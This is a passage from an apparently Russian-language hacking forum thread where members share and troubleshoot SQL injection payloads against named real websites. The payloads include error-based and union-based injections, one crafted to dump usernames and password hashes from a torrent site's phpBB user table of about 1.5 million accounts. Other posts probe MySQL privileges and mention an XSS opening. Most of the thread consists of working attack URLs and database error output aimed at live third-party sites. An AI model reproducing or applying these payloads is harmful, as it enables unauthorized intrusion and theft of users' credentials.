Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Так не убеждаются, убеждаются так:
    Code:
    http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count(*),concat((select+concat(count(*),0x00)+from+phpbb_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
    Code:
    Duplicate entry '[COLOR=Green]1566699[/COLOR]' for key 'group_key' [1062]
    1566699 пользователей.

    Code:
    http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count(*),concat((select+concat(count(*),0x00)+from+xbt_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
    Code:
    Duplicate entry '[COLOR=Green]1567844[/COLOR]' for key 'group_key' [1062]
    1567844 пользователей.

    А вот и вывод:
    Code:
    http://torrnado.ru/peerlist.php?id=982+or+(@:=1)||@+group+by+concat((select+substr(concat_ws(0x3a,username,user_password),1,100)+from+phpbb_users+limit+1,1),@:=@-1)having+@||min(@:=0)--+f
    ...
     
    #19941 Ereee, 25 Mar 2012
    Last edited by a moderator: 25 Mar 2012
    1 person likes this.
  2. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ну так я же и написал

    отсюда torrent:xbt_users:1567810
    torrenth:ppbb_users:1551912

    чё ето за чудо конструкция такая?
    (@:=1)||@

    где в муналах по sql я про неё могу почитать
     
  3. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Переменные, как не сложно догадатся.
     
  4. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    http://www.scientific-work.ru/index.php?id=303+union+select+1,2,3,4,5,6,7,8,9,10--+
    тут не пойму как данные вывести
    что не подставлю лимит или - пишет что не такой страници

    и тут тоже
    http://www.ivrus.biz/showcat.php?id=7+union+select+version%28%29,version%28%29,version%28%29--+
     
    #19944 qaz, 25 Mar 2012
    Last edited: 25 Mar 2012
  5. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.scientific-work.ru/index.php?id=-303+union+select+1,2,3,4,5,6,7,version(),0x1,10--+ Вот так. Данные при редиректе в строке URL.
     
    1 person likes this.
  6. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Вывода нет походу:
    http://www.ivrus.biz/showcat.php?id=7-9999999.9+union+select+user(),user(),user()--+f
    Но за то, можно заюзать как XSS.
     
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    http://board.ugmk.info/?rub=topic&page=3144&from=943260
    а тут как? что не подставлю постоянно ошибка
     
  8. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    В LIMITе там, не раскрутишь.
    Крути эту:
    http://board.ugmk.info/?b=1332679205
     
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ок, а тут как?
    http://baratro.ru/subcat.php?id=22'

    таже самая проблема
     
  10. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Там легко же... =\
     
  11. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Друзья! Не забываем про внимательность и настойчивось.

    ПРОФИТ:
    http://www.ivrus.biz/showphoto.php?fid=6&pid=4&id=-1+union+select+1,2,3,user(),5,6,7--+



    А вообще вот так:
    http://www.ivrus.biz/showcat.php?id=7+union+select+1,2,3+from+mysql.user--+

    можно понять что пользователь mysql имеет какие-то более-менее значимые привилегии в данном случае 'в слепую'.
     
    #19951 Cennarios, 25 Mar 2012
    Last edited: 25 Mar 2012
    1 person likes this.
  12. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    I need help on this one.

    Code:
    http://allbahrain.com/list_resturant_menu.php?resturant=1
    Tried so many synthax, maybe it's tricky.
     
  13. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    http://allbahrain.com/list_resturant_menu.php?resturant=1+and+substring(version(),1,1)=5--+f
     
  14. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75

    хм.. действительно

    так не
    http://baratro.ru/subcat.php?id=22%27+and%28select+1+from%28select+count%28*%29,concat%28%28select+table_name+from+information_schema.tables+limit+0,1%29,0x00,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29--+

    так тоже

    http://baratro.ru/subcat.php?id=22%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

    о, так пашет

    http://baratro.ru/subcat.php?id=22'+or+(@:=1)||@+group+by+concat((select+version()),@:=@-1)having+@||min(@:=0)--+f

    блин, чёт не пойму, @:=1 там между собакой и двоеточием должно быть имя переменной которой присваиваем еденицу, как ето конструкция ваще ваызывает вывоод?
     
  15. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Ну так ты вначале переменную определяешь, как можно применять различные операции на неизвестно что.
     
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    никак, ет типа получается ещо один вид выода чарез ошибку?
     
  17. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Зачем использование переменных?
    Вот все выводит:
    http://baratro.ru//subcat.php?id=22'or(1)+group+by+concat(version(),floor(rand(0)*2))having(min(0))or(1)and'


    Твой запрос не работает из-за комментария:

    http://baratro.ru/subcat.php?id=22'and(select+1+from(select+count(*),concat((select+concat(version(),0x3a)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and'

    Вместо and', тот, что на конце можно использовать 100500 вариантов:
    -- a
    and'
    and'1'='1
    %23
    И т.д...
     
    1 person likes this.
  18. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Привет

    Подскажите как раскрутить скулю если я не могу оборвать запрос стандартными --+
    + так и выводится в ошибке как плюс
    Пробовал /**/ - режется
    %09...%20 и т.д. так-же выводятся в ошибке как есть

    PHP:
    SELECT FROM users WHERE link 'admin'--+'
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' 
    at line 1
     
  19. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Попробуй:
    PHP:
    SELECT FROM users WHERE link 'admin' and '1'='1
     
  20. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Не прокатывает.

    PHP:
    SELECT FROM users WHERE link 'admin'+and+1='1'
    You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax to use near 'and+1='1'' at line 1
     
Thread Status:
Not open for further replies.